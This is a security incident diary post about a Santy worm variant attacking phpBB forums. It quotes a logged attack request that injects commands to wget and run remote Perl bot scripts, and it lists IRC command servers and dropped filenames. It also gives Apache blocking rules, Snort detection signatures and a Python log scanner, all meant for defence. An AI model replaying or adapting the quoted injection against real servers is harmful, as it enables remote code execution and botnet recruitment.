Santy Variant?; Year End Poll
Santy Variant?
Merry Christmas! Unfortunately, the greetings from Marcus to all our readers have to be kept short.
http://isc.sans.org/diary.php?date=2004-12-24
We are putting this up early because we have been receiving several reports of a possible Santy variant worm. It is, however, quite different from the original Santy worm.
It tries to pull several scripts from an affected forum (running phpBB). The forum could have been compromised and used as a base to attack others. Here is one of the submissions we received; the others are quite similar.
"GET /modules.php?name=http://www.[XXX].net/spy.gif?&cmd=cd%20/tmp;
wget%20www.[XXX].net/spybot.txt;wget%20www.[XXX].net/worm1.txt;
wget%20www.[XXX].net/php.txt;wget%20www.[XXX].net/ownz.txt;
wget%20www.[XXX].net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;
perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 21626 "-" "LWP::Simple/5.803"
You can see that the files it pulls down include:
spy.gif (which contains a script)
spybot.txt
worm1.txt
php.txt
ownz.txt
zone.txt
worm1.txt is a Perl script which attempts to search Google/Yahoo for vulnerable systems.
$site = "www.google.com";
$procura = "inurl:viewtopic.php?t=$numero";
spybot.txt is another Perl script which attempts to set up an IRC channel connection to irc.gigachat.net:6667.
From other pieces of logs submitted, we have seen the following IRC servers:
ssh.gigachat.net
leaf-sunwave.animirc.net
eu.undernet.org
irc.efnet.net
Note that the above filenames change depending on which host it is trying to wget from. Other filenames include:
adfkgnnodfijg
bot
bot.txt
bot.txt.1
dry.scp
ssh.a
terrorbot.txt
terrorbot.txt.1
terrorworm.txt
terrorworm.txt.1
unbot.txt
unbot.txt.1
unbot.txt.2
unbot.txt.3
unworm.txt
unworm.txt.1
unworm.txt.2
unworm.txt.3
worm1.txt
worm.txt
worm.txt.1
One of our readers has blocked this attack with Apache configuration directives such as these:
SetEnvIf User-Agent "LWP::" get_lost
SetEnvIf User-Agent "lwp-trivial" get_lost
<Directory /usr/local/apache/htdocs/your_phpdirectory>
Order Allow,Deny
Deny from env=get_lost
Allow from all
</Directory>
Another reader has created this Apache rule:
<Directory /*>
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ - [F]
</Directory>
K-Otik has published a copy that uses AOL/Yahoo search instead.
http://www.k-otik.com/exploits/20041225.SantyB.php
Let us know if you have seen the same thing.
Here are some Snort signatures written by Erik:
alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants searching for targets"; content:"GET /search|3f|q=inurl|3a2a|.php|3f2a|="; nocase; pcre:"/\d+&start=\d+/iR"; classtype:trojan-activity; sid:900024; rev:1; )
alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants searching for targets"; content:"GET /search|3f|"; nocase; content: "q=inurl|3a|"; nocase; content:".php|3f|"; nocase; within:10; pcre:"/&start=\d+/i"; classtype: trojan-activity; sid:900024; rev:2; )
alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants searching for targets (yahoo)"; content:"GET /search|3f|"; nocase; content: "p=inurl|3a|"; nocase; content:".php|3f2a|="; nocase; within:10; pcre:"/\d+/iR"; content:"&ei=UTF-8&fl=0&all=1&pstart=1&b="; nocase; pcre:"/\d+/iR"; flow:to_server,established; classtype: trojan-activity; sid:900024; rev:3; )
alert tcp $HOME_NET any -> any 6667 (msg:"Suspected Botnet Activity"; classtype: string-detect; sid:900025; rev:1; tag:session,50,packets; content: "PRIVMSG"; nocase; pcre:"/(cheguei gazelas|meh que tao|Status|Tempo|Total pacotes|Total bytes|Média de envio|portas? aberta)/i"; )
alert tcp any any -> $HOME_NET $HTTP_PORTS (msg: "suspected php injection attack"; content: "GET /"; nocase; content: ".php|3f|"; nocase; within: 64; pcre: "/(name=http|cmd=.*(cd|perl|wget|id|uname|t?ftp))/i"; flow:to_server,established; classtype: trojan-activity; sid:900026; rev:1; )
Bleeding Snort has also created some Snort signatures to detect this:
http://www.bleedingsnort.com/
Use them as you deem fit.
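The two readers' Apache rules and Erik's sid:900026 signature are three checks on the same request (the LWP user agent, the echr/esystem query strings and the name=http / cmd= injection). As an added example that is not from the diary or its contributors, this Python script applies those three checks to Apache combined-format access-log lines so the pattern can be hunted in logs already on disk. The sample lines, the example.net host and the rule names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines, not from the diary: line 1 mirrors the submitted
# request with the hostile host replaced by example.net; line 3 only exercises the reader's
# echr/esystem RewriteCond and is not a working exploit string.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Dec/2004:03:12:44 +0000] "GET /modules.php?name=http://www.example.net/'
    'spy.gif?&cmd=cd%20/tmp;wget%20www.example.net/spybot.txt;perl%20spybot.txt HTTP/1.1" '
    '200 21626 "-" "LWP::Simple/5.803"',
    '10.0.0.6 - - [25/Dec/2004:03:13:01 +0000] "GET /viewtopic.php?t=42 HTTP/1.1" '
    '200 8123 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [25/Dec/2004:03:14:10 +0000] "GET /index.php?highlight=%27.esystem(x) '
    'HTTP/1.1" 200 512 "-" "lwp-trivial/1.41"',
]
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# First reader's rule: SetEnvIf User-Agent "LWP::" / "lwp-trivial".
UA_RE = re.compile(r'LWP::|lwp-trivial')
# Second reader's rule: RewriteCond %{QUERY_STRING} echr / esystem, on the raw query string.
QUERY_RE = re.compile(r'echr|esystem')
# Erik's sid:900026 pcre, applied after one round of %-decoding; its "id" alternative is broad.
INJECT_RE = re.compile(r'\.php\?.*?(?:name=http|cmd=.*?(?:cd|perl|wget|id|uname|t?ftp))', re.I)

def classify_request(line):
    """Return the names of the diary's rules that this log line trips ([] if none)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    hits = []
    uri = m.group("uri")
    if UA_RE.search(m.group("ua")):
        hits.append("lwp-user-agent")
    if QUERY_RE.search(uri.partition("?")[2]):
        hits.append("echr-esystem-query")
    if INJECT_RE.search(unquote(uri)):
        hits.append("php-injection")
    return hits

def scan(lines):
    """Client IP -> rules tripped, for lines that tripped at least one rule."""
    report = {}
    for line in lines:
        hits = classify_request(line)
        if hits:
            m = LOG_RE.match(line)
            report[m.group("ip") if m else "unparsed"] = hits
    return report
```

scan(SAMPLE_LOG) returns {'10.0.0.5': ['lwp-user-agent', 'php-injection'], '10.0.0.7': ['lwp-user-agent', 'echr-esystem-query']}; feed it the lines of your own access_log to look for the same traffic.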
Year End Poll
Earlier, we asked you what your favorite diary is:
http://isc.sans.org/diary.php?date=2004-12-12
Have you sent us your vote? If not, send us your choice now. We will close the poll on New Year's Eve and let you know the result soon after.